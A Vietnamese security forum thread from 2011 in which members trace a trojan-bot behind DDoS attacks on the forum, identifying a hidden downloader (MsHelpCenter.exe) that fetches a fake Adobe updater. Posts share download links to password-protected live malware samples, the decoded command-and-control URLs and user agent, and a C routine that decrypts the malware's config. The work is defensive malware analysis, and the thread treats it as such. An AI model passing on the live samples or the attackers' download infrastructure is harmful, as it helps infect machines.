Vấn đề anh đang suy nghĩ và tìm kiếm chính là thằng giấu mặt này nè ! Có lẽ nó không thể là GoogleCrashHandler hay wcsntfy.* hay bất cứ gì. Nó là thằng giấu mặt từ trước giờ mà ta không biết.
Kịch bản của nó như vầy nè: Định kỳ kiểm tra một website nào đó và chắc chắn website này ta chưa biết, download 1 file cấu hình về, parse, parse xong lại down con bot (mạo danh AcrobatUpdater) về.
Down AcrobatUpdater về, extract vào thư mục temp, lấy đuôi là .msi, name thì GetTempName, copy vào %Program Files% thành AcrobatUpdater.exe, ShellExecute hay CreateProcessA/W nó, rồi xoá file .msi mạo danh đi.
Em nói đúng không mấy thằng "Sống chết theo lệnh", nói sai thì em xin ngừng uống bia lon 1 ngày (bà xã em cũng mừng luôn !!!???). Chính vì vậy mà đống file trong Temp của asaxin đã up lên chả có file .msi nào cả. Xoá mẹ nó hết rồi mà ! Mấy anh là coder, em cũng từng là coder, mấy anh nghĩ gì thì em cũng nghĩ như vậy !
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 12:12:26 (+0700) | #84 | 244089
acoustics89
Member
[Minus] 0 [Plus]
Joined: 08/07/2011 10:17:19
Bài gởi: 50
Offline
[Profile] [PM]
lequi wrote:
@PXMMRF: Em sẽ kiểm tra các thông tin anh cần, và có 1 vài lưu ý là các thông tin e để trên đều liên quan đến DNS của Google, vì các thông tin trên tổng hợp trong quá trình bắt các packet gửi qua IP 8.8.8.8 (ngày mai em sẽ dump và gửi cho a vài chi tiết).

Hôm nay em cũng có dạo qua các site, và down bộ unikey từ link: http://nethoabinh.com/showthread.php?t=315
Quét file này trên virustotal: http://www.virustotal.com/file-scan/report.html?id=02b3b347ff00c8bdcad7e4c557a41f36e4af110658aea57557fab2c0bd641b1e-1311508169


Mình vừa check bộ Unikey setup này , cho đến giờ phút post bài này, file đó là file sạch. Bạn yên tâm nhé
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 12:13:55 (+0700) | #85 | 244090
acoustics89
Member
[Minus] 0 [Plus]
Joined: 08/07/2011 10:17:19
Bài gởi: 50
Offline
[Profile] [PM]
TQN wrote:
Ặc ặc, acoustics90 lại xúi bậy rồi. Chờ asaxin up lên thằng nào down AcrobeUpdater.exe về chứ. Phải có thằng down về thì mới có AcrobatUpdater.exe.
Vấn đề anh đang suy nghĩ và tìm kiếm chính là thằng giấu mặt này nè !


Uh. em quên béng mất. Không hiểu thằng nào là thằng đầu tiên tải cái này nhỉ, theo em biết thì Jucheck tải về, nhưng có thể nó đi theo đường khác lắm.

[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 12:20:15 (+0700) | #86 | 244092
nobitapm
Member
[Minus] 0 [Plus]
Joined: 21/07/2008 13:54:41
Bài gởi: 5
Offline
[Profile] [PM]
acoustics89 wrote:
nobitapm wrote:
E kiểm tra máy e thấy có file jucheck.exe tại thư mục như trên.
Gửi anh PXMMRF mẫu file jucheck.exe Code:
http://www.mediafire.com/?wpbh40voy00k87w


Mẫu này không phải virus, bạn yên tâm nhé

Thanks bạn acoustic89. smilie
TQN wrote:
2 Nobitapm: file jucheck.exe đó của em là file sạch, chính hãng Sun, bảo hành đàng hoàng. Máy em install Win7 64bit à ?

Cảm ơn anh TQN. Win7 64bit đúng rồi đó anh smilie. Do e không rành về IT nên không biết kiểm tra file sạch hay virus. smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 12:27:23 (+0700) | #87 | 244093
[Avatar]
asaxin
Member
[Minus] 0 [Plus]
Joined: 24/06/2007 13:11:27
Bài gởi: 30
Offline
[Profile] [PM]
Tiếc quá, mình xoá hết rồi, mới ăn cơm xong. Hồi sáng có chạy chương trình cports và smsniff nhưng không chụp hình của nó. smilie
No Signature
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 12:31:47 (+0700) | #88 | 244094
[Avatar]
bolzano_1989
Journalist
[Minus] 0 [Plus]
Joined: 30/01/2007 12:49:15
Bài gởi: 1406
Offline
[Profile] [PM]
asaxin wrote:
Tiếc quá, mình xoá hết rồi, mới ăn cơm xong. Hồi sáng có chạy chương trình cports và smsniff nhưng không chụp hình của nó. smilie


Bạn cứ gửi boot log với Process Monitor đi smilie .
Hướng dẫn scan và gửi boot log với Process Monitor
http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-boot-log-v7899i-process-monitor/


Gửi log Autoruns nữa:
Hướng dẫn scan và gửi log Autoruns
http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 12:41:59 (+0700) | #89 | 244096
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
2 asaxin: Bạn chỉ mới xoá AcrobatUpdater.exe và mấy file .msi linh tinh trong thư mục %Temp%. Nhưng thằng downloader giấu mặt vẫn chắc chắn tồn tại 100% trên máy của bạn.
Yên tâm, cứ từ từ nghiền ngẫm và tìm ra thằng giấu mặt này. Mấy anh STL đang đọc topic này cũng đang tự hỏi trong máy bạn, thằng giấu mặt, nằm vùng là thằng nào ? Làm sao cho nó biến mất đây ? Ai biểu code "mèo què" cho cố vô rồi giờ không biết máy nào nhiểm A, máy nào nhiểm B... Em hướng dẫn nhé: chỉ cần modify source một chút thôi, cho thằng nằm vùng gởi về, ê, tao là Ver xxx nè, file name xxx nè, mấy anh build em vào ngày x, giờ Y nè. Rồi theo file config mà thằng nằm vùng down về, mấy anh ra lệnh: à mày, ver x, name Y phải không, mày làm theo lệnh tao như vầy vầy nè ! Mấy anh không làm kiểu đó thì bây giờ chính mấy anh cũng rối, phải không mấy anh em STL ?
Cùng là người VN cả mà, thương nhau, đùm bọc nhau, chứ ai muốn dồn mấy anh vào đường cùng đâu !? Quay đầu là bờ mà, phải không mấy anh "Theo Lệnh Sống Chết", ăn lương ngoại bang, "rước voi về dày mã tổ", củng là "mồ mả ông bà nội mấy anh". Chứ không lý có thằng tàu khựa nào biết và đọc về nhật ký chống DDOS của anh conmale ???!!!

Bạn asaxin cứ bình tĩnh, từ từ mà làm: manh mối con giấu mặt, nằm vùng thì bây giờ chỉ có trên mấy bạn thôi ! Bạn yên tâm, nó vẫn tồn tại và sống nhăn răn 100%. Và nó cũng không thể tự xoá được. STL chưa viết một dòng code nào cho .exe tự xoá cả. Toàn nhờ thằng .exe khác xoá nó. Bạn tìm ra được con giấu mặt đấy thì giúp biết bao nhiêu cho mọi anh em đang đọc topic này, giúp cho mọi người đang tìm, vạch mặt đám bán nước, theo ngoại bang này.

Nếu bạn tìm được đích thị thằng nằm vùng đó, em sẽ chỉ cần bỏ ra 3h RCE là lòi ra master website mới của mấy thằng STL này (mẹ nó, mình tôn sùng STL: Standard Template Library của C++, do bao guru C++ viết ra, mà giờ viết tắt phải chịu viết cái tên thối tha, dơ bẩn của tụi "Sống chết theo lệnh" này).
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 12:48:40 (+0700) | #90 | 244097
[Avatar]
asaxin
Member
[Minus] 0 [Plus]
Joined: 24/06/2007 13:11:27
Bài gởi: 30
Offline
[Profile] [PM]
hi bolzano_1989,

Mình để file Process Monitor và autorun trong link dưới:

http://www.mediafire.com/?0n270j9v6jknqje

password: malware

@TQN: vậy để từ từ em nghiền ngẫm, vì máy em dính trojan là laptop chạy Windows, còn máy duyệt web chạy linux. Ai muốn xoá mấy file trong laptop máy em cũng khó.
No Signature

bolzano_1989
Journalist
[Minus] 0 [Plus]
Joined: 30/01/2007 12:49:15
Bài gởi: 1406
Offline
[Profile] [PM]
asaxin nén và upload các file sau cho mình và anh TQN:
c:\windows\microsoft help\mshelpcenter.exe

Bạn gửi file cho mình qua địa chỉ email sau:




CMC InfoSec sẽ cập nhật mầm virus này sớm nhất có thể.

Anh chị em kiểm tra nếu trong máy tính nào có file ở đường dẫn trên, vui lòng gửi cho mình và anh TQN gấp, xin cảm ơn.
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 13:16:42 (+0700) | #92 | 244100
acoustics89
Member
[Minus] 0 [Plus]
Joined: 08/07/2011 10:17:19
Bài gởi: 50
Offline
[Profile] [PM]
Hóng mẫu, có mẫu mới thì em post tiếp, nếu không thì em đi ngủ smilie

A ha, lại là MsHelpCenter.exe smilie smilie

Nếu thế bạn lấy luôn các file sau cùng 1 lượt cho tiện, đỡ up nhiều
MsHelpCenter.idx
thumbcache.db
_desktop.ini
cùng thư mục cả đấy, tổng cộng tầm 10MB, code thì ít mà toàn sh!t bên trong
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 13:23:40 (+0700) | #93 | 244102
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Theo 2 file Autoruns và ProcMon của Asaxin, mình thấy máy đang dính virus của STL của Asaxin cũng đang dùng WinXP SP3 (hay Win7) phải không ?
Nhờ Asaxin up các file sau trên máy của bạn:
1. C:\Windows\system32\Dwm.exe: file này XP SPxxx không bao giờ có !
2. C:\Windows\Fonts\StaticCache.dat: Lại là StaticCaches à, sao đặt trong Windows\Fonts
3. C:\Windows\System32\dllhost.exe: chưa biết, để em sigcheck và symchk.
4. C:\Program Files\quicktime\qttask.exe: Không chắc lắm, có thể file của QuickTime
5. c:\program files\internet download manager\idman.exe: bạn đang dùng bản crack của IDM phải không ?
6. C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll
7. C:\Program Files\Google\GoogleToolbarNotifier\5.6.5805.1910\swg.dll
8. GoogleUpdate.exe: Mọi file luôn, cho dù nằm ở đâu !
9. wmpnscfg.exe: Mọi file, cho dù nằm ở đâu !
10. C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
11. c:\program files\common files\installshield\driver\1150\intel 32\idrivert.exe
12. c:\windows\microsoft help\mshelpcenter.exe
13. c:\program files\common files\sony shared\avlib\sptisrv.exe

File nào không có thì thôi, chịu khó chút nhé bạn !
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 13:24:07 (+0700) | #94 | 244103
[Avatar]
asaxin
Member
[Minus] 0 [Plus]
Joined: 24/06/2007 13:11:27
Bài gởi: 30
Offline
[Profile] [PM]
Mình đã gửi mẫu này cho bolzano_1989 và TQN trong tin nhắn riêng.
No Signature
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 13:43:21 (+0700) | #95 | 244104
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Đã nhận được file của asaxin.
Đúng rồi,còn thiếu thumbcache.db và _desktop.ini nữa, asaxin bật chế độ view hidden file lên, tìm và up giùm 2 file đó.
Đích thị nằm vùng của STL rồi, không biết là mới hay cũ so với mẫu của acxxx89 ?
Chia sẽ với bà con luôn: http://www.mediafire.com/?0jomzjk727n7181. Password: malware
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 13:46:50 (+0700) | #96 | 244105
[Avatar]
bolzano_1989
Journalist
[Minus] 0 [Plus]
Joined: 30/01/2007 12:49:15
Bài gởi: 1406
Offline
[Profile] [PM]
acoustics89 wrote:
Hóng mẫu, có mẫu mới thì em post tiếp, nếu không thì em đi ngủ smilie

A ha, lại là MsHelpCenter.exe smilie smilie

Nếu thế bạn lấy luôn các file sau cùng 1 lượt cho tiện, đỡ up nhiều
MsHelpCenter.idx
thumbcache.db
_desktop.ini
cùng thư mục cả đấy, tổng cộng tầm 10MB, code thì ít mà toàn sh!t bên trong


Còn thiếu!

asaxin gửi thêm các file sau cho mình nhé:
C:\MsHelpCenter.pdb
c:\windows\microsoft help\thumbcache.db
c:\windows\microsoft help\_desktop.ini
c:\windows\microsoft help\MsHelpCenter.idx

TQN wrote:
Đã nhận được file của asaxin.
Đúng rồi,còn thiếu thumbcache.db và _desktop.ini nữa, asaxin bật chế độ view hidden file lên, tìm và up giùm 2 file đó.
Đích thị nằm vùng của STL rồi, không biết là mới hay cũ so với mẫu của acxxx89 ?
Chia sẽ với bà con luôn: http://www.mediafire.com/?0jomzjk727n7181. Password: malware

Em thấy còn thiếu MsHelpCenter.pdb .
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 13:53:05 (+0700) | #97 | 244106
[Avatar]
asaxin
Member
[Minus] 0 [Plus]
Joined: 24/06/2007 13:11:27
Bài gởi: 30
Offline
[Profile] [PM]
Trong thư mục c:\windows\microsoft help của mình chỉ có 2 file là .exe và idx đã gửi thôi, không còn file nào khác.
No Signature
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 14:00:56 (+0700) | #98 | 244107
[Avatar]
bolzano_1989
Journalist
[Minus] 0 [Plus]
Joined: 30/01/2007 12:49:15
Bài gởi: 1406
Offline
[Profile] [PM]
asaxin wrote:
Trong thư mục c:\windows\microsoft help của mình chỉ có 2 file là .exe và idx đã gửi thôi, không còn file nào khác.


Bạn chịu khó dùng GMER hay Winrar, tìm đến thư mục c:\windows\microsoft help\ rồi copy file.
Hiện cần 2 file sau để decrypt:
c:\windows\microsoft help\thumbcache.db
c:\windows\microsoft help\_desktop.ini
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 14:04:21 (+0700) | #99 | 244108
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Thằng ông nội coder của stl (viết thường mày luôn cho bỏ ghét) khi build mshelpcenter.idx lại để debuginfo sót lại trong .exe file:
G:\LiveUpdate\DummyLauncher\Release\DummyLauncher.pdb

Ái chà chà, hai file mshelpcenter.exe và mshelpcenter.idx "hơi bị xưa" rồi:
1.mshelpcenter.exe: build date: 27/12/2010, 10:21:59.
2. mshelpcenter.idx: 21/11/2010, 01:43:19 - thức khuya dữ vậy ha - tội nghiệp coder STL, cày như trâu bò ! Thằng code con gì đó ngày 30/04 còn không được đi chơi với em út, gia đình nữa !?
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 14:12:09 (+0700) | #100 | 244109
[Avatar]
asaxin
Member
[Minus] 0 [Plus]
Joined: 24/06/2007 13:11:27
Bài gởi: 30
Offline
[Profile] [PM]
Dấu kỹ quá, dùng winrar mới thấy ra.
c:\windows\microsoft help\thumbcache.db
c:\windows\microsoft help\_desktop.ini

http://www.mediafire.com/?8fxq7un19ardwfe
password: malware
No Signature
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 14:21:37 (+0700) | #101 | 244111
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Hì hì, đủ file rồi đó acoustics89. Em RCE tiếp và tìm ra thằng website nào ra lệnh down AcrobeUpdater.exe về nhé. Giờ anh phải đi lang thang nữa rồi.
2 asaxin: Good job, tiếp tục chịu khó up các file mà tui đã list ở trên để kiểm tra luôn nhé !
Thank you very nhiều !
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 14:24:22 (+0700) | #102 | 244112
[Avatar]
asaxin
Member
[Minus] 0 [Plus]
Joined: 24/06/2007 13:11:27
Bài gởi: 30
Offline
[Profile] [PM]
TQN wrote:
Hì hì, đủ file rồi đó acoustics89. Em RCE tiếp và tìm ra thằng website nào ra lệnh down AcrobeUpdater.exe về nhé. Giờ anh phải đi lang thang nữa rồi.
2 asaxin: Good job, tiếp tục chịu khó up các file mà tui đã list ở trên để kiểm tra luôn nhé !
Thank you very nhiều !


Đây là mẫu mà em tìm được trong máy: http://www.mediafire.com/?agsg6yco2amvle0

password: malware
No Signature
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 14:32:39 (+0700) | #103 | 244115
acoustics89
Member
[Minus] 0 [Plus]
Joined: 08/07/2011 10:17:19
Bài gởi: 50
Offline
[Profile] [PM]
Thank bộ mẫu của bạn asaxin. Đây là mẫu mới chưa gặp bao giờ, tuy cũng hơi giống với mẫu cũ mình có, mình vừa reverse xong, chia sẻ với các bạn

Trước tiên là về Tác dụng của các file
C:\MsHelpCenter.pdb >>> chịu, mình không có file này
c:\windows\microsoft help\thumbcache.db >>> Thư viện hỗ trợ download thôi
c:\windows\microsoft help\_desktop.ini >> thư viện chứa hàm sinh xâu ngẫu nhiên, hàm giải mã DecodeStr, nói chung là Utility Library
c:\windows\microsoft help\MsHelpCenter.idx >> chưa xong, post sau

MsHelpCenter.exe >> CHịu trách nhiệm tải cái adobe lởm về để chạy.

G4GD7ND0CDL4DB7CB0CD3ED6KD9YC2FDYN7BD0OCP4JD7QD0ED3FD6HDO0TC3OC6CD chứa đường dẫn được mã hoá, key là n / 123 = 456. Thuật toán mã hoá thì mình chưa xem kĩ nhưng thiết nghĩ không cần lắm vì xâu này cố định rồi. nó sau khi giải mã ra là http://poxxf.com/flash.swf , tải file này về với User Agent là Gozilla_2/Default.

cái link để download là http://poxxf.com/flash.swf?cpn=<User name>

Lại vào đọc code tiếp , thấy nó giải mã file này bằng 1 thuật toán decode khác, em cũng chả hiểu lắm, nó làm gì thì mình làm thế


Code:
#include <stdio.h>
#include <conio.h>
#include <windows.h>

int main(int argc, char *argv[])
{
FILE *f; int i;
long lSize;
char *pBuffer, *p;
char v24,v23;
int v7 = 0;


char szOutPut[MAX_PATH] = "";

if ((argc <2) || (argc >3 ))
{
printf("Usage: Decode <Encrypted> <Result>");
exit(1);

}
if (argc == 2)
{
strcpy(szOutPut, "Decoded.txt");
}
else strncpy(szOutPut, argv[2],MAX_PATH);

f = fopen(argv[1], "rb"); //doc file da ma hoa

if (f)
{
fseek(f, 0, SEEK_END);
lSize = ftell(f);
fseek(f, 0, SEEK_SET);

pBuffer =(char*) malloc(lSize+1024);
if(pBuffer)
{

p = (char *)pBuffer+ 4;
memset(pBuffer, 0, lSize+1024);
fread((char*)pBuffer, lSize, 1, f);

for ( i = 8; i < lSize; ++i )
{
v24 = p[v7 % 4];
v23 = pBuffer[i];
v23 = (v24 ^ v23) % 256;
pBuffer[i] = v23;
v7++;
//v8 += v23 * v7++ % 7;
}
}
fclose(f);


if (pBuffer)
{
f = fopen(szOutPut, "wb");
if (f)
{
fwrite((char*)pBuffer, lSize, 1, f); // ghi lai noi dung da giai ma
fclose(f);
}
else printf("Can not open output file.");
delete[] pBuffer ;
}
}
else printf("Can not open input file.");
return 0;
}


giải mã xong thì được xâu : http://poxxf.com/images.gif, lại tải về với User Agent là Gozilla_2/Default

thấy nhiều kí tự 0x19 ở đầu file quá nhỉ, dung lượng lại lớn ( 282624 bytes) , cho vào Hex workshop XOR phát, may thì được luôn mà không thì đọc code tiếp smilie

Xor xong thì nó ra cái AdobeUpdate giả. Có lẽ đến đây, anh em đã biết thủ phạm tải cái adobe giả về

[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 14:42:52 (+0700) | #104 | 244116
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Không biết nói lời nào nữa, quá trời good job luôn acoustics89 ! Em làm nhanh thiệt, anh thì cứ đi từng file, từng hàm của nó. Nên chậm hơn em nhiều.

Vậy là bà con đã biết thằng nằm vùng giấu mặt down AcrobatUpdater.exe về rồi nhé. Thủ phạm đây: MsHelpCenter.exe.

Bà con tuyên truyền mọi người quen biết, cộng đồng mạng nên nhanh tay xoá MsHelpCenter.* và cái thumbcache.db, _desktop.ini.

Cảm ơn acoustics89, asaxin, bolzano (theo thứ tự ABC nhé, không phân bì nhé) rất nhiều. Nhờ các bạn, một đám "mèo què" của stl nằm vùng đã bị bà con vạch mặt.

Và cũng nhờ mọi người, bà con cùng nhau tiếp tục úp các mẫu này cho các AV để các AV cập nhật và thịt cổ đám "mèo què" này: MS, KIS/KAV, Avira, AVG, Symantec, Trend...
Thịt xong đám mshelpcenter này và AcrobatUpdater.exe này, chắc chắn STL sẽ không còn nhiều "hàng" để chơi trò bẩn thỉu DDOS nữa.
Các bà con khác tiếp tục dùng Wireshark, CurPorts, SmartSniffs để tìm và up mẫu lên cho mọi người. Cũng có thể còn một (hay vài thằng nằm vùng nào đó nữa smilie )
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 15:04:08 (+0700) | #105 | 244119
PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
acoustics89 wrote:
nobitapm wrote:
PXMMRF wrote:

2- Ngoài Acrobatupdater.exe, các bạn cũng cần kiểm tra sự hiện diện của các service process sau:

- AdobeUpdateManager.exe
- jucheck.exe (process giả update Java)
- OSA.exe
Chúng nằm ở các directories sau:

Program Files\Adobe\AdobeUpdateManager.exe
Program Files\Java\jre6\bin\jucheck.exe
Program Files\Microsoft Office\Office11\OSA.exe

Chúng cũng là thành phần của Trojan-bot đấy

3- Có bạn nào có mẫu của Trojan-Bot đang tấn công HVA xin gửi cho tôi để tôi kiểm tra. Chắc chắn sẽ có nhiều thông tin hữu ích. Cả chiều hôm nay bật máy, hạ firewall, disable các antivirus, truy cập đến nhiều website cho là nguy hiểm, mà không kiếm đươc con nào cả

Thank you in advance.




E kiểm tra máy e thấy có file jucheck.exe tại thư mục như trên.
Gửi anh PXMMRF mẫu file jucheck.exe Code:
http://www.mediafire.com/?wpbh40voy00k87w




Mẫu này không phải virus, bạn yên tâm nhé


Hì hì.
Nó là thành phần của virus W32/VulcaBot của STL đấy.

Tham khảo kỹ lai McAfee blog tại:
http://blogs.mcafee.com/corporate/cto/vietnamese-speakers-targeted-in-cyberattack

Đây là trường hợp "a Trojan horse masquerading as jucheck.exe" (Trojan hay virus đeo mặt nạ giả danh jucheck.exe). Vì jucheck.exe nguyên mẫu trong java là file chính thức của application này dùng để kiểm tra và nhắc nhở user update cho Java. Tác giả các virus thường dùng tên của một service hay tên file chính thức của OS, application để làm người dùng bối rối và tránh bị detect trong một số trường hợp.


Trong trường hợp này ta phải kiểm tra kỹ với cách sau:

1- Kiểm tra xem file có digitally signed bởi Sun Microsystems, Inc không? Đây là yêu cầu quan trong và chính xác nhất

2 -Kiểm tra vị trí của file trong các directory xem có đúng không?

jucheck.exe chính thức, nguyên bản phải nằm ở directory sau:

C:\Program Files\Java\jre1.6.0_01\bin\jucheck.exe.
Trong đó phần jre1.6.0_01 là tuỳ theo version của Java.

Nếu jucheck.exe. nằm ở location dưới đây như McAfee đã viết ở blog trên:
C:\Program Files\Java\jre6\bin\jucheck.exe
thì jucheck.exe có thể vẫn là virus nếu máy bạn không đang cài Version mới nhất của Java. Trong trường hợp cài version mới nhất của Java thì Jucheck.exe có dung lượng là 422 KB (trên nên Win7)

Nhưng nếu jucheck.exe lại nằm hay còn nằm ở các location sau:
C:\Windows\System32\
C:\Program Files\Common Files\
hay
C:\Users\AppData\Local\Temp\
và đặc biệt là
C:\Windows\jucheck.exe

Thì rất nhiều khả năng jucheck.exe là virus của STL

Tôi chưa kiểm tra file jucheck.exe mà bạn nobitapm upload lên mediafire là file thật hay giả (vì bận kiểm việc khác)
Xin bạn kiểm tra lại kỹ hơn

Thưc tế cũng không đơn giản như ta nghĩ, nhất là với STL. C' est la vie mà


The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 15:53:00 (+0700) | #106 | 244121
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
TQN wrote:
Không biết nói lời nào nữa, quá trời good job luôn acoustics89 ! Em làm nhanh thiệt, anh thì cứ đi từng file, từng hàm của nó. Nên chậm hơn em nhiều.

Vậy là bà con đã biết thằng nằm vùng giấu mặt down AcrobatUpdater.exe về rồi nhé. Thủ phạm đây: MsHelpCenter.exe.

Bà con tuyên truyền mọi người quen biết, cộng đồng mạng nên nhanh tay xoá MsHelpCenter.* và cái thumbcache.db, _desktop.ini.

Cảm ơn acoustics89, asaxin, bolzano (theo thứ tự ABC nhé, không phân bì nhé) rất nhiều. Nhờ các bạn, một đám "mèo què" của stl nằm vùng đã bị bà con vạch mặt.

Và cũng nhờ mọi người, bà con cùng nhau tiếp tục úp các mẫu này cho các AV để các AV cập nhật và thịt cổ đám "mèo què" này: MS, KIS/KAV, Avira, AVG, Symantec, Trend...
Thịt xong đám mshelpcenter này và AcrobatUpdater.exe này, chắc chắn STL sẽ không còn nhiều "hàng" để chơi trò bẩn thỉu DDOS nữa.
Các bà con khác tiếp tục dùng Wireshark, CurPorts, SmartSniffs để tìm và up mẫu lên cho mọi người. Cũng có thể còn một (hay vài thằng nằm vùng nào đó nữa smilie )


Hì hì, công nhận acoustics89 nhanh khiếp smilie.

Anh nghĩ cái đống "mèo què" chưa hết đâu em. Theo anh thăm dò thì shells, hosts, domains.... còn nhiều lắm. Kỳ này phối hợp để "xin" vài cái địa chỉ thiệt thì hoạ may tình hình mới khác.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 16:09:23 (+0700) | #107 | 244123
acoustics89
Member
[Minus] 0 [Plus]
Joined: 08/07/2011 10:17:19
Bài gởi: 50
Offline
[Profile] [PM]
nhưng mấy anh ơi, bài toán lại bắt đầu lại rồi : MsHelpCenter.exe
Câu hỏi: ai tải cái MsHelpCenter.exe và các file kia về ?? smilie

Trả lời nốt câu này mới ổn ??
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 16:13:43 (+0700) | #108 | 244124
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Kệ nó em, acoustics89. Tới đây là được rồi, vì MsHelpCenter.exe đã cũ rồi, từ tháng 12 năm ngoái, lại được hardcoded string poxxf.com. Nó nằm nằm vùng lâu rồi. Giờ cắt được nó là coi như cắt 1 tay của tụi stl rồi.
Chiều giờ ngồi nhà theo dõi topic này luôn. Ngoài trời đang mưa nữa, có lý do ngồi nhà hợp lý smilie

[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 16:33:23 (+0700) | #109 | 244125
thegunner2401
Member
[Minus] 0 [Plus]
Joined: 20/07/2011 06:35:07
Bài gởi: 2
Offline
[Profile] [PM]
E lại thấy ba file jucheck.exe nằm trong các thư mục:
C:\Program Files\Adobe\Adobe Dreamweaver CS5\JVM\bin
C:\ProgramData\Adobe\CS5\jre\bin
C:\Program Files\Common Files\Java\Java Update
Vậy liệu có những file nào bất thường ko các A?
Nếu có thì E sẽ up lên để các A RE.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 25/07/2011 16:39:12 (+0700) | #110 | 244126
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
TQN wrote:
Kệ nó em, acoustics89. Tới đây là được rồi, vì MsHelpCenter.exe đã cũ rồi, từ tháng 12 năm ngoái, lại được hardcoded string poxxf.com. Nó nằm nằm vùng lâu rồi. Giờ cắt được nó là coi như cắt 1 tay của tụi stl rồi.
